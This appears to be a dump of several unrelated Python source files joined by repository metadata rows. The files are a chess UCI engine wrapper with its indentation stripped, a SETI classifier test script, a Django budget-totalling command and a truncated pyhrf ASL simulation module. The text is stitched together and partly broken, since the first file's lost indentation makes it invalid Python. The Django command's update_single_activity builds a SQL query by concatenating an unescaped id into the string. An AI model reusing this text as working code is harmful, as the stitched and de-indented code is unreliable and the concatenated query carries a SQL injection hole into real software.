class UciEngine(object):
"""Handle the uci engine communication."""
def __init__(self, file: str, uci_shell: UciShell, home=''):
super(UciEngine, self).__init__()
try:
self.shell = uci_shell.get_spur()
if home:
file = home + os.sep + file
if self.shell:
self.engine = chess.uci.spur_spawn_engine(self.shell, [file])
else:
self.engine = chess.uci.popen_engine(file, stderr=DEVNULL)
self.file = file
if self.engine:
handler = Informer()
self.engine.info_handlers.append(handler)
self.engine.uci()
else:
logging.error('engine executable [%s] not found', file)
self.options = {}
self.future = None
self.show_best = True
self.res = None
self.level_support = False
self.installed_engines = read_engine_ini(self.shell, (file.rsplit(os.sep, 1))[0])
except OSError:
logging.exception('OS error in starting engine')
except TypeError:
logging.exception('engine executable not found')
def get_name(self):
"""Get engine name."""
return self.engine.name
def get_options(self):
"""Get engine options."""
return self.engine.options
def option(self, name, value):
"""Set OptionName with value."""
self.options[name] = value
def send(self):
"""Send options to engine."""
logging.debug('setting engine with options %s', self.options)
self.engine.setoption(self.options)
def has_levels(self):
"""Return engine level support."""
has_lv = self.has_skill_level() or self.has_handicap_level() or self.has_limit_strength() or self.has_strength()
return self.level_support or has_lv
def has_skill_level(self):
"""Return engine skill level support."""
return 'Skill Level' in self.engine.options
def has_handicap_level(self):
"""Return engine handicap level support."""
return 'Handicap Level' in self.engine.options
def has_limit_strength(self):
"""Return engine limit strength support."""
return 'UCI_LimitStrength' in self.engine.options
def has_strength(self):
"""Return engine strength support."""
return 'Strength' in self.engine.options
def has_chess960(self):
"""Return chess960 support."""
return 'UCI_Chess960' in self.engine.options
def has_ponder(self):
"""Return ponder support."""
return 'Ponder' in self.engine.options
def get_file(self):
"""Get File."""
return self.file
def get_installed_engines(self):
"""Get installed engines."""
return self.installed_engines
def position(self, game: Board):
"""Set position."""
self.engine.position(game)
def quit(self):
"""Quit engine."""
if self.engine.quit(): # Ask nicely
if self.engine.terminate(): # If you won't go nicely....
if self.engine.kill(): # Right that does it!
return False
return True
def uci(self):
"""Send start uci command."""
self.engine.uci()
def stop(self, show_best=False):
"""Stop engine."""
logging.info('show_best old: %s new: %s', self.show_best, show_best)
self.show_best = show_best
if self.is_waiting():
logging.info('engine already stopped')
return self.res
try:
self.engine.stop()
except chess.uci.EngineTerminatedException:
logging.error('Engine terminated') # @todo find out, why this can happen!
return self.future.result()
def go(self, time_dict: dict):
"""Go engine."""
self.show_best = True
time_dict['async_callback'] = self.callback
# Observable.fire(Event.START_SEARCH())
self.future = self.engine.go(**time_dict)
return self.future
def ponder(self):
"""Ponder engine."""
self.show_best = False
# Observable.fire(Event.START_SEARCH())
self.future = self.engine.go(ponder=True, infinite=True, async_callback=self.callback)
return self.future
def brain(self, time_dict: dict):
"""Permanent brain."""
self.show_best = True
time_dict['ponder'] = True
time_dict['async_callback'] = self.callback3
# Observable.fire(Event.START_SEARCH())
self.future = self.engine.go(**time_dict)
return self.future
def hit(self):
"""Send a ponder hit."""
logging.info('show_best: %s', self.show_best)
self.engine.ponderhit()
self.show_best = True
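    # Hypothetical usage sketch (engine binary path assumed, not part of the
    # original class):
    #   engine = UciEngine('/usr/bin/stockfish', UciShell())
    #   engine.startup({}, Board())
    #   engine.go({'movetime': 1000})  # python-chess go() keyword argument
    #   result = engine.stop(show_best=True)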
def callback(self, command):
"""Callback function."""
try:
self.res = command.result()
except chess.uci.EngineTerminatedException:
logging.error('Engine terminated') # @todo find out, why this can happen!
self.show_best = False
logging.info('res: %s', self.res)
# Observable.fire(Event.STOP_SEARCH())
if self.show_best and self.res:
EvtObserver.fire(Event.BEST_MOVE(move=self.res.bestmove, ponder=self.res.ponder, inbook=False))
else:
logging.info('event best_move not fired')
def callback3(self, command):
"""Callback function."""
try:
self.res = command.result()
except chess.uci.EngineTerminatedException:
logging.error('Engine terminated') # @todo find out, why this can happen!
self.show_best = False
logging.info('res: %s', self.res)
# Observable.fire(Event.STOP_SEARCH())
if self.show_best and self.res:
EvtObserver.fire(Event.BEST_MOVE(move=self.res.bestmove, ponder=self.res.ponder, inbook=False))
else:
logging.info('event best_move not fired')
def is_thinking(self):
"""Engine thinking."""
return not self.engine.idle and not self.engine.pondering
def is_pondering(self):
"""Engine pondering."""
return not self.engine.idle and self.engine.pondering
def is_waiting(self):
"""Engine waiting."""
return self.engine.idle
def newgame(self, game: Board):
"""Engine sometimes need this to setup internal values."""
self.engine.ucinewgame()
self.engine.position(game)
def mode_send(self, ponder: bool, analyse: bool):
"""Set engine mode."""
self.option('Ponder', ponder)
self.option('UCI_AnalyseMode', analyse)
self.send()
def chess960_send(self, flag):
"""Send UCI_Chess960 flag to engine."""
if self.has_chess960():
self.option('UCI_Chess960', flag)
self.send()
def startup(self, options: dict, game: Board, new_game=True):
"""Startup engine."""
parser = configparser.ConfigParser()
parser.optionxform = str
if not options:
if self.shell is None:
success = parser.read(self.get_file() + '.uci')
else:
try:
with self.shell.open(self.get_file() + '.uci', 'r') as file:
parser.read_file(file)
success = True
except FileNotFoundError:
success = False
if success:
options = dict(parser[parser.sections().pop()])
self.level_support = bool(options)
self.options = options
self.chess960_send(game.has_chess960_castling_rights())
if new_game:
self.newgame(game)
logging.debug('Loaded engine [%s]', self.get_name())
logging.debug('Supported options [%s]', self.get_options())
| gpl-3.0 | 5,526,358,255,197,360,000 | 33.321678 | 120 | 0.590261 | false |
sgrvinod/ml4seti-Effsubsee | test_cpu.py | 1 | 6512 | from __future__ import print_function
import argparse
import os
import time
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim
import torch.utils.data
import torchvision.transforms as transforms
from wresnet_models import *
from h5_dataloaders import *
import pandas as pd
parser = argparse.ArgumentParser(description='SETI Classifier - Test Model')
parser.add_argument('arch', metavar='PATH',
help='architecture to use')
parser.add_argument('checkpoint', metavar='PATH',
help='path to model checkpoint')
parser.add_argument('h5data', metavar='PATH',
help='path to hdf5 file with test data')
parser.add_argument('h5normalizedata', metavar='PATH',
help='path to hdf5 file with mean and std-dev tensors')
parser.add_argument('-j', '--workers', default=1, type=int, metavar='N',
help='number of data loading workers (default: 1)')
parser.add_argument('-b', '--batch-size', default=16, type=int,
metavar='N', help='mini-batch size')
parser.add_argument('--lr', '--learning-rate', default=0.1, type=float,
metavar='LR', help='initial learning rate')
parser.add_argument('--momentum', default=0.9, type=float, metavar='M',
help='momentum')
parser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,
metavar='W', help='weight decay (default: 1e-4)')
parser.add_argument('--print-freq', '-p', default=10, type=int,
metavar='N', help='print frequency (default: 10)')
# Available models
# model_archs = ['resnet18', 'resnet34', 'resnet50', 'resnet86', 'resnet101', 'resnet131', 'resnet203', 'resnet152',
# 'resrnn2x2', 'resrnn2x3', 'resrnn3x2', 'resrnn3x3', 'resrnn3x10', 'wresnet28x10', 'wresnet16x8',
# 'wresnet34x2', 'wresnet40x10', 'wresnet28x20', 'densenet161', 'densenet201', 'dpn92', 'dpn98',
# 'dpn131']
model_archs = ['wresnet34x2']
def main():
"""
Load model's graph, loss function, optimizer, dataloaders.
Perform testing.
"""
global args
args = parser.parse_args()
print("\n\nChosen args:")
print(args)
assert args.arch in model_archs
model = eval(args.arch + '()').cpu()
if os.path.isfile(args.checkpoint):
print("=> Loading checkpoint '{}'".format(args.checkpoint))
checkpoint = torch.load(args.checkpoint, map_location=lambda storage, loc: storage)
args.start_epoch = checkpoint['epoch']
best_acc = checkpoint['best_acc']
print("This model had an accuracy of %.2f on the validation set." % (best_acc,))
keys = checkpoint['state_dict'].keys()
for old_key in keys:
new_key = old_key.replace('module.', '')
checkpoint['state_dict'][new_key] = checkpoint['state_dict'].pop(old_key)
model.load_state_dict(checkpoint['state_dict'])
print("=> Loaded checkpoint '{}' (epoch {})"
.format(args.checkpoint, checkpoint['epoch']))
else:
print("=> No checkpoint found at '{}'".format(args.checkpoint))
cudnn.benchmark = False
# Store {index->UUID} mapping in the order in the test set, to keep track of the UUIDs of the data in the DataLoader
# This isn't really required since the DataLoader returns in the original order with shuffle=False, but hey...
print('UUID mapping... ')
h = h5py.File(args.h5data, 'r')
global uuid_index_mapping
uuid_index_mapping = {}
for i in range(h['uuids'][:].shape[0]):
uuid_index_mapping[i] = h['uuids'][:][i][0]
h.close()
# Normalizer
print('Normalizing signals...')
h = h5py.File(args.h5normalizedata, 'r')
mean = torch.FloatTensor(h['mean'][:])
mean = mean.permute(2, 0, 1)
std_dev = torch.FloatTensor(h['std_dev'][:])
std_dev = std_dev.permute(2, 0, 1)
h.close()
normalize = transforms.Normalize(mean=mean,
std=std_dev)
# Custom dataloader
print('Instantiating test loader')
test_loader = torch.utils.data.DataLoader(
h5TestDataset(args.h5data, transforms.Compose([normalize])),
batch_size=args.batch_size, shuffle=False,
num_workers=args.workers, pin_memory=False)
test(test_loader, model)
def test(test_loader, model):
"""
Perform testing.
"""
print('Perform testing')
model.eval() # eval mode
all_probs = []
all_uuids = []
batch_time = AverageMeter() # forward prop. time this batch
start = time.time()
softmax = torch.nn.Softmax() # need this, since there is no longer a loss layer
for i, (input, uuids) in enumerate(test_loader):
softmax.zero_grad()
# Store UUIDs associated with this batch, in the right order
uuids = list(uuids.numpy().ravel())
all_uuids.extend(uuids)
input_var = torch.autograd.Variable(input, volatile=True).cpu()
output = model(input_var)
probs = softmax(output)
all_probs.append(probs.data)
batch_time.update(time.time() - start)
start = time.time()
if i % args.print_freq == 0:
print('Test: [{0}/{1}]\t'
'Batch Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'.format(i, len(test_loader),
batch_time=batch_time))
all_probs = torch.cat(all_probs).cpu() # concatenate probs from all batches, move to CPU
all_uuids = [uuid_index_mapping[i] for i in all_uuids] # convert UUID indices to UUIDs
# Create dataframe and store as CSV
df1 = pd.DataFrame({'UUIDs': pd.Series(all_uuids)})
df2 = pd.DataFrame(all_probs.numpy())
df = pd.concat([df1, df2], axis=1)
csv_path = './TESTRESULTS__' + args.checkpoint.split('/')[-1] + '__' + args.h5data.split('/')[-1] + '.csv'
df.to_csv(csv_path, header=False, index=False)
print("\nSaved results to {0}\n".format(csv_path))
class AverageMeter(object):
"""
Keeps track of most recent, average, sum, and count of a metric.
"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
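# Illustrative usage sketch of AverageMeter (not part of the original script):
def _demo_average_meter():
    meter = AverageMeter()
    for batch_time in (0.12, 0.10, 0.11):
        meter.update(batch_time)
    return meter.avg  # running average, here 0.11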
if __name__ == '__main__':
main()
| apache-2.0 | 1,589,429,932,012,462,800 | 34.010753 | 120 | 0.600276 | false |
schlos/OIPA-V2.1 | OIPA/iati/management/commands/total_budget_updater.py | 1 | 1856 | import datetime
# Django specific
from django.core.management.base import BaseCommand
from django.db import connection
from iati.models import Activity, Budget
import logging
logger = logging.getLogger(__name__)
class Command(BaseCommand):
option_list = BaseCommand.option_list
counter = 0
def handle(self, *args, **options):
parser = TotalBudgetUpdater()
        parser.update()
class TotalBudgetUpdater():
def get_fields(self, cursor):
desc = cursor.description
results = [
dict(zip([col[0] for col in desc], row))
for row in cursor.fetchall()
]
return results
def update(self):
cursor = connection.cursor()
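        # sum all budget values per activity in a single aggregate query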
        cursor.execute('SELECT activity_id, sum(value) as total_value FROM iati_budget b GROUP BY activity_id')
results = self.get_fields(cursor=cursor)
for r in results:
cur_act = Activity.objects.get(id=r['activity_id'])
cur_act.total_budget = r['total_value']
cur_act.save()
return True
def update_single_activity(self, id):
try:
cursor = connection.cursor()
cursor.execute("SELECT activity_id, sum(value) as total_value FROM iati_budget b WHERE activity_id ='" + id + "' GROUP BY activity_id")
results = self.get_fields(cursor=cursor)
for r in results:
cur_act = Activity.objects.get(id=r['activity_id'])
cur_act.total_budget = r['total_value']
cur_act.save()
except Exception as e:
logger.info("error in " + id + ", def: update_single_activity")
if e.args:
logger.info(e.args[0])
if e.args.__len__() > 1:
logger.info(e.args[1])
if e.message:
                logger.info(e.message)
| agpl-3.0 | 7,268,961,908,031,832,000 | 28.47619 | 147 | 0.587823 | false |
philouc/pyhrf | python/pyhrf/sandbox/physio.py | 1 | 30326 | import os.path as op
import numpy as np
from pyhrf import Condition
from pyhrf.paradigm import Paradigm
from pyhrf.tools import Pipeline
import pyhrf.boldsynth.scenarios as simbase
PHY_PARAMS_FRISTON00 = {
'model_name' : 'Friston00',
'tau_s' : 1/.8,
'eps' : .5,
'eps_max': 10., #TODO: check this
'tau_m' : 1.,
'tau_f' : 1/.4,
'alpha_w' : .2,
'E0' : .8,
'V0' : .02,
'k1' : 7 * .8,
'k2' : 2.,
'k3' : 2 * .8 - .2}
PHY_PARAMS_FMRII = {
'model_name' : 'fmrii',
'tau_s' : 1/.65,
'eps' : 1.,
'eps_max': 10., #TODO: check this
'tau_m' : .98,
'tau_f' : 1/.41,
'alpha_w' : .5,
'E0' : .4,
'V0' : .01,}
PHY_PARAMS_KHALIDOV11 = {
'model_name' : 'Khalidov11',
'tau_s' : 1.54,
'eps' : .54,
'eps_max': 10., #TODO: check this
'tau_m' : 0.98,
'tau_f' : 2.46,
'alpha_w' : .33,
'E0' : .34,
'V0' : 1,
'k1' : 7 * .34,
'k2' : 2.,
'k3' : 2 * .34 - .2}
#TODO: Donnet, Deuneux
from scipy.stats import truncnorm
def create_tbg_neural_efficacies(physiological_params, condition_defs, labels):
"""
Create neural efficacies from a truncated bi-Gaussian mixture.
Ars:
- physiological_params (dict (<param_name> : <param_value>):
parameters of the physiological model
- condition_defs (list of pyhrf.Condition):
list of condition definitions. Each item should have the following
fields (moments of the mixture):
- m_act (0<=float<eff_max): mean of activating component
- v_act (0<float): variance of activating component
- v_inact (0<float): variance of non-activating component
- labels (np.array((nb_cond, nb_vox), int)): binary activation states
Return:
np.array(np.array((nb_cond, nb_vox), float))
-> the generated neural efficacies
TODO: settle how to relate brls and prls to neural efficacies
"""
eff_max = physiological_params['eps_max']
eff = []
for ic,c in enumerate(condition_defs):
labels_c = labels[ic]
mask_activ = np.where(labels_c)
        # truncnorm -> loc is mean, scale is std_dev; scipy's truncnorm takes
        # its truncation bounds in standardized units:
        # a = (lower - loc) / scale, b = (upper - loc) / scale
        s_inact = c.v_inact**.5
        eff_c = truncnorm.rvs(0., eff_max / s_inact, loc=0., scale=s_inact,
                              size=labels_c.size)
        s_act = c.v_act**.5
        eff_c[mask_activ] = truncnorm.rvs(-c.m_act / s_act,
                                          (eff_max - c.m_act) / s_act,
                                          loc=c.m_act, scale=s_act,
                                          size=labels_c.sum())
eff.append(eff_c)
return np.vstack(eff)
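# Illustrative sketch (not part of the original module), assuming that
# pyhrf.Condition accepts the mixture moments as keyword arguments, as in the
# simulate_* functions below:
def _demo_tbg_neural_efficacies():
    conditions = [Condition(name='audio', m_act=10., v_act=.1, v_inact=.2)]
    labels = np.array([[0, 1, 1, 0]])  # 1 condition, 4 voxels
    return create_tbg_neural_efficacies(PHY_PARAMS_FRISTON00, conditions,
                                        labels)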
def phy_integrate_euler(phy_params, tstep, stim, epsilon, Y0=None):
"""
    Integrate the ODEs of the physiological model with the Euler method.
Args:
- phy_params (dict (<param_name> : <param_value>):
parameters of the physiological model
- tstep (float): time step of the integration, in seconds.
- stim (np.array(nb_steps, float)): stimulation sequence with a temporal
resolution equal to the time step of the integration
- epsilon (float): neural efficacy
- Y0 (np.array(4, float) | None): initial values for the physiological
signals.
If None: [0, 1, 1, 1.]
                     N  f_in  v  q  (flow inducing, inflow, blood volume, HbR)
Result:
- np.array((4, nb_steps), float)
-> the integrated physiological signals, where indexes of the first
axis correspond to:
0 : flow inducing
1 : inflow
          2 : blood volume
          3 : HbR
TODO: should the output signals be rescaled wrt their value at rest?
"""
tau_s = phy_params['tau_s']
tau_f = phy_params['tau_f']
tau_m = phy_params['tau_m']
alpha_w = phy_params['alpha_w']
E0 = phy_params['E0']
def cpt_phy_model_deriv(y, s, epsi, dest):
N, f_in, v, q = y
if f_in < 0.:
#raise Exception('Negative f_in (%f) at t=%f' %(f_in, ti))
#HACK
print 'Warning: Negative f_in (%f) at t=%f' %(f_in, ti)
f_in = 1e-4
dest[0] = epsi*s - (N/tau_s)-((f_in - 1)/tau_f) #dNdt
dest[1] = N #dfidt
dest[2] = (1/tau_m)*(f_in-v**(1/alpha_w)) #dvdt
dest[3] = (1/tau_m)*((f_in/E0)*(1-(1-E0)**(1/f_in)) - \
(q/v)*(v**(1/alpha_w))) #dqdt
return dest
res = np.zeros((stim.size+1,4))
    res[0,:] = Y0 if Y0 is not None else np.array([0., 1., 1., 1.])
    # note: 'Y0 or ...' would be ambiguous when Y0 is a numpy array
for ti in xrange(1, stim.size+1):
cpt_phy_model_deriv(res[ti-1], stim[ti-1], epsilon, dest=res[ti])
res[ti] *= tstep
res[ti] += res[ti-1]
return res[1:,:].T
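# Illustrative sketch (not part of the original module): integrate the model
# for a single impulse at t=0, with a .05s time step over 25s.
def _demo_phy_integrate_euler():
    tstep = .05
    stim = np.zeros(int(25. / tstep))
    stim[0] = 1.
    return phy_integrate_euler(PHY_PARAMS_FRISTON00, tstep, stim, epsilon=1.)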
def create_evoked_physio_signals(physiological_params, paradigm,
neural_efficacies, dt, integration_step=.05):
"""
Generate evoked hemodynamics signals by integrating a physiological model.
Args:
- physiological_params (dict (<pname (str)> : <pvalue (float)>)):
parameters of the physiological model.
In jde.sandbox.physio see PHY_PARAMS_FRISTON00, PHY_PARAMS_FMRII ...
- paradigm (pyhrf.paradigm.Paradigm) :
the experimental paradigm
- neural_efficacies (np.ndarray (nb_conditions, nb_voxels, float)):
neural efficacies involved in flow inducing signal.
- dt (float):
temporal resolution of the output signals, in second
- integration_step (float):
time step used for integration, in second
Returns:
- np.array((nb_signals, nb_scans, nb_voxels), float)
-> All generated signals, indexes of the first axis correspond to:
- 0: flow inducing
- 1: inflow
- 2: blood volume
- 3: [HbR]
"""
#TODO: handle multiple conditions
# -> create input activity signal [0, 0, eff_c1, eff_c1, 0, 0, eff_c2, ...]
# for now, take only first condition
first_cond = paradigm.get_stimulus_names()[0]
stim = paradigm.get_rastered(integration_step)[first_cond][0]
neural_efficacies = neural_efficacies[0]
# response matrix intialization
integrated_vars = np.zeros((4, neural_efficacies.shape[0], stim.shape[0]))
for i, epsilon in enumerate(neural_efficacies):
integrated_vars[:,i,:] = phy_integrate_euler(physiological_params,
integration_step, stim,
epsilon)
#downsampling:
nb_scans = paradigm.get_rastered(dt)[first_cond][0].size
dsf = int(dt/integration_step)
return np.swapaxes(integrated_vars[:,:,::dsf][:,:,:nb_scans], 1, 2)
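# Illustrative sketch (not part of the original module): evoked signals for a
# single-impulse paradigm and one voxel, mirroring the Paradigm construction
# used in create_physio_brf below.
def _demo_evoked_physio_signals():
    p = Paradigm({'c': [np.array([0.])]}, [25.5], {'c': [np.array([1.])]})
    n = np.array([[1.]])
    return create_evoked_physio_signals(PHY_PARAMS_FRISTON00, p, n, dt=.5)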
def create_bold_from_hbr_and_cbv(physiological_params, hbr, cbv):
"""
Compute BOLD signal from HbR and blood volume variations obtained
by a physiological model
"""
# physiological parameters
V0 = physiological_params['V0']
k1 = physiological_params['k1']
k2 = physiological_params['k2']
k3 = physiological_params['k3']
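    # BOLD observation equation of the balloon model:
    # y = V0 * (k1*(1-q) + k2*(1-q/v) + k3*(1-v)), with q=HbR, v=blood volume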
return V0 *( k1*(1-hbr) + k2*(1-hbr/cbv) + k3*(1-cbv) )
def create_physio_brf(physiological_params, response_dt=.5,
response_duration=25.,return_brf_q_v=False):
"""
Generate a BOLD response function by integrating a physiological model and
setting its driving input signal to a single impulse.
Args:
- physiological_params (dict (<pname (str)> : <pvalue (float)>)):
parameters of the physiological model.
In jde.sandbox.physio see PHY_PARAMS_FRISTON00, PHY_PARAMS_FMRII ...
- response_dt (float): temporal resolution of the response, in second
- response_duration (float): duration of the response, in second
Return:
- np.array(nb_time_coeffs, float)
-> the BRF (normalized)
    - also return brf_not_normalized, q, v when return_brf_q_v=True
(for error checking of v and q generation in calc_hrfs)
"""
p = Paradigm({'c':[np.array([0.])]}, [response_duration+response_dt],
{'c':[np.array([1.])]})
n = np.array([[1.]])
s,f,v,q = create_evoked_physio_signals(physiological_params, p, n,
response_dt)
brf = create_bold_from_hbr_and_cbv(physiological_params, q[:,0], v[:,0])
if return_brf_q_v:
return brf/ (brf**2).sum()**.5, q, v
else:
return brf / (brf**2).sum()**.5
def create_physio_prf(physiological_params, response_dt=.5,
response_duration=25.,return_prf_q_v=False):
"""
    Generate a perfusion response function by setting the driving input signal
    of the given physiological model to a single impulse.
Args:
- physiological_params (dict (<pname (str)> : <pvalue (float)>)):
parameters of the physiological model.
In jde.sandbox.physio see PHY_PARAMS_FRISTON00, PHY_PARAMS_FMRII ...
- response_dt (float): temporal resolution of the response, in second
- response_duration (float): duration of the response, in second
Return:
- np.array(nb_time_coeffs, float)
-> the PRF
    - also return prf_not_normalized, q, v when return_prf_q_v=True
(for error checking of v and q generation in calc_hrfs)
"""
p = Paradigm({'c':[np.array([0.])]}, [response_duration+response_dt],
{'c':[np.array([1.])]}) # response_dt to match convention
# in JDE analysis
n = np.array([[1.]])
s,f,v,q = create_evoked_physio_signals(physiological_params, p, n,
response_dt)
prf = f[:,0] - f[0,0] #remove y-intercept
if return_prf_q_v:
return prf/ (prf**2).sum()**.5, q, v
else:
return prf / (prf**2).sum()**.5
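# Illustrative sketch (not part of the original module): generate both
# normalized response functions on the default temporal grid.
def _demo_physio_response_functions():
    brf = create_physio_brf(PHY_PARAMS_FRISTON00)
    prf = create_physio_prf(PHY_PARAMS_FRISTON00)
    return brf, prf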
def rescale_bold_over_perf(bold_stim_induced, perf_stim_induced,
bold_perf_ratio=5.):
return bold_stim_induced/bold_stim_induced.max() * bold_perf_ratio * \
perf_stim_induced.max()
def create_asl_from_stim_induced(bold_stim_induced_rescaled, perf_stim_induced,
ctrl_tag_mat, dsf, perf_baseline, noise,
drift=None, outliers=None):
"""
Downsample stim_induced signal according to downsampling factor 'dsf' and
add noise and drift (nuisance signals) which has to be at downsampled
temporal resolution.
"""
bold = bold_stim_induced_rescaled[0:-1:dsf,:].copy()
perf = np.dot(ctrl_tag_mat, (perf_stim_induced[0:-1:dsf,:].copy() + \
perf_baseline))
asl = bold + perf
if drift is not None:
asl += drift
if outliers is not None:
asl += outliers
asl += noise
return asl
def simulate_asl_full_physio(output_dir=None, noise_scenario='high_snr',
spatial_size='tiny'):
"""
Generate ASL data by integrating a physiological dynamical system.
    Args:
- output_dir (str|None): path where to save outputs as nifti files.
If None: no output files
- noise_scenario ("high_snr"|"low_snr"): scenario defining the SNR
- spatial_size ("tiny"|"normal") : scenario for the size of the map
- "tiny" produces 2x2 maps
- "normal" produces 20x20 maps
Result:
dict (<item_label (str)> : <simulated_item (np.ndarray)>)
-> a dictionary mapping names of simulated items to their values
WARNING: in this dict the 'bold' item is in fact the ASL signal.
This name was used to be compatible with JDE which assumes
that the functional time series is named "bold".
TODO: rather use the more generic label 'fmri_signal'.
TODO: use magnetization model to properly simulate final ASL signal
"""
drift_var = 10.
dt = .5
dsf = 2 #down sampling factor
if spatial_size == 'tiny':
lmap1, lmap2, lmap3 = 'tiny_1', 'tiny_2', 'tiny_3'
elif spatial_size == 'random_small':
lmap1, lmap2, lmap3 = 'random_small', 'random_small', 'random_small'
else:
lmap1, lmap2, lmap3 = 'icassp13', 'ghost', 'house_sun'
if noise_scenario == 'high_snr':
v_noise = 0.05
conditions = [
Condition(name='audio', m_act=10., v_act=.1, v_inact=.2,
label_map=lmap1),
Condition(name='video', m_act=11., v_act=.11, v_inact=.21,
label_map=lmap2),
Condition(name='damier', m_act=12., v_act=.12, v_inact=.22,
label_map=lmap3),
]
else: #low_snr
v_noise = 2.
conditions = [
Condition(name='audio', m_act=1.6, v_act=.3, v_inact=.3,
label_map=lmap1),
Condition(name='video', m_act=1.6, v_act=.3, v_inact=.3,
label_map=lmap2),
]
simulation_steps = {
'dt' : dt,
'dsf' : dsf,
'tr' : dt * dsf,
'condition_defs' : conditions,
# Paradigm
'paradigm' : simbase.create_localizer_paradigm_avd,
# Labels
'labels_vol' : simbase.create_labels_vol,
'labels' : simbase.flatten_labels_vol,
'nb_voxels': lambda labels: labels.shape[1],
# Neural efficacy
'neural_efficacies' : create_tbg_neural_efficacies,
# BRF
'primary_brf' : create_physio_brf,
'brf' : simbase.duplicate_brf,
# PRF
'primary_prf' : create_physio_prf,
'prf' : simbase.duplicate_prf,
# Physiological model
'physiological_params' : PHY_PARAMS_FRISTON00,
('flow_induction','perf_stim_induced','cbv','hbr') :
create_evoked_physio_signals,
'bold_stim_induced' : create_bold_from_hbr_and_cbv,
# Noise
'v_gnoise' : v_noise,
'noise' : simbase.create_gaussian_noise_asl,
# Drift
'drift_order' : 4,
'drift_var' : drift_var,
'drift_coeffs': simbase.create_drift_coeffs_asl,
'drift' : simbase.create_polynomial_drift_from_coeffs_asl,
# ASL
'ctrl_tag_mat' : simbase.build_ctrl_tag_matrix,
'asl_shape' : simbase.calc_asl_shape,
# Perf baseline #should be the inflow at rest ... #TODO
'perf_baseline' : simbase.create_perf_baseline,
'perf_baseline_mean' : 0.,
'perf_baseline_var': 0.,
# maybe rename to ASL (should be also modified in JDE)#TODO
'bold' : simbase.create_asl_from_stim_induced,
}
simu_graph = Pipeline(simulation_steps)
# Compute everything
simu_graph.resolve()
simulation = simu_graph.get_values()
if output_dir is not None:
#simu_graph.save_graph_plot(op.join(output_dir, 'simulation_graph.png'))
simbase.simulation_save_vol_outputs(simulation, output_dir)
# f = open(op.join(output_dir, 'simulation.pck'), 'w')
# cPickle.dump(simulation, f)
# f.close()
return simulation
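# Hedged usage sketch (illustrative, not part of the original module): run the
# tiny high-SNR scenario fully in memory; no files are written when output_dir
# is None.
def _demo_simulate_asl_full_physio():
    simu = simulate_asl_full_physio(output_dir=None, noise_scenario='high_snr',
                                    spatial_size='tiny')
    return simu['bold']  # NB: despite its key, this holds the ASL signal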
def simulate_asl_physio_rfs(output_dir=None, noise_scenario='high_snr',
spatial_size='tiny'):
"""
    Generate ASL data according to an LTI system, with the PRF and BRF
    generated from a physiological model.
    Args:
        - output_dir (str|None): path where to save outputs as nifti files.
          If None: no output files
        - noise_scenario ("high_snr"|"low_snr_low_prl"|"low_snr"): scenario
          defining the SNR
        - spatial_size ("tiny"|"random_small"|"normal"): scenario for the size
          of the maps
          - "tiny" produces 2x2 maps
          - "normal" produces 20x20 maps
Result:
dict (<item_label (str)> : <simulated_item (np.ndarray)>)
-> a dictionary mapping names of simulated items to their values
WARNING: in this dict the 'bold' item is in fact the ASL signal.
This name was used to be compatible with JDE which assumes
that the functional time series is named "bold".
TODO: rather use the more generic label 'fmri_signal'.
"""
drift_var = 10.
dt = .5
dsf = 2 #down sampling factor
if spatial_size == 'tiny':
lmap1, lmap2, lmap3 = 'tiny_1', 'tiny_2', 'tiny_3'
elif spatial_size == 'random_small':
lmap1, lmap2, lmap3 = 'random_small', 'random_small', 'random_small'
else:
lmap1, lmap2, lmap3 = 'icassp13', 'ghost', 'house_sun'
if noise_scenario == 'high_snr':
v_noise = 0.05
conditions = [
Condition(name='audio', perf_m_act=5., perf_v_act=.1, perf_v_inact=.2,
bold_m_act=15., bold_v_act=.1, bold_v_inact=.2,
label_map=lmap1),
Condition(name='video', perf_m_act=5., perf_v_act=.11, perf_v_inact=.21,
bold_m_act=14., bold_v_act=.11, bold_v_inact=.21,
label_map=lmap2),
Condition(name='damier', perf_m_act=12.,
perf_v_act=.12, perf_v_inact=.22,
bold_m_act=20., bold_v_act=.12, bold_v_inact=.22,
label_map=lmap3),
]
elif noise_scenario == 'low_snr_low_prl':
v_noise = 7.
scale = .3
print 'noise_scenario: low_snr_low_prl'
conditions = [
Condition(name='audio', perf_m_act=1.6*scale, perf_v_act=.1,
perf_v_inact=.1,
bold_m_act=2.2, bold_v_act=.3, bold_v_inact=.3,
label_map=lmap1),
Condition(name='video', perf_m_act=1.6*scale, perf_v_act=.1,
perf_v_inact=.1,
bold_m_act=2.2, bold_v_act=.3, bold_v_inact=.3,
label_map=lmap2),
]
else: #low_snr
v_noise = 2.
conditions = [
Condition(name='audio', perf_m_act=1.6, perf_v_act=.3,
perf_v_inact=.3,
bold_m_act=2.2, bold_v_act=.3, bold_v_inact=.3,
label_map=lmap1),
Condition(name='video', perf_m_act=1.6, perf_v_act=.3,
perf_v_inact=.3,
bold_m_act=2.2, bold_v_act=.3, bold_v_inact=.3,
label_map=lmap2),
]
simulation_steps = {
'dt' : dt,
'dsf' : dsf,
'tr' : dt * dsf,
'condition_defs' : conditions,
# Paradigm
'paradigm' : simbase.create_localizer_paradigm_avd,
'rastered_paradigm' : simbase.rasterize_paradigm,
# Labels
'labels_vol' : simbase.create_labels_vol,
'labels' : simbase.flatten_labels_vol,
'nb_voxels': lambda labels: labels.shape[1],
# Physiological model (for generation of RFs)
'physiological_params' : PHY_PARAMS_FRISTON00,
# Brls
'brls' : simbase.create_time_invariant_gaussian_brls,
# Prls
'prls' : simbase.create_time_invariant_gaussian_prls,
# BRF
'primary_brf' : create_physio_brf,
'brf' : simbase.duplicate_brf,
# PRF
'primary_prf' : create_physio_prf,
'prf' : simbase.duplicate_prf,
# Perf baseline
'perf_baseline' : simbase.create_perf_baseline,
'perf_baseline_mean' : 1.5,
'perf_baseline_var': .4,
# Stim induced
'bold_stim_induced' : simbase.create_bold_stim_induced_signal,
'perf_stim_induced' : simbase.create_perf_stim_induced_signal,
# Noise
'v_gnoise' : v_noise,
'noise' : simbase.create_gaussian_noise_asl,
# Drift
'drift_order' : 4,
'drift_var' : drift_var,
'drift_coeffs':simbase.create_drift_coeffs_asl,
'drift' : simbase.create_polynomial_drift_from_coeffs_asl,
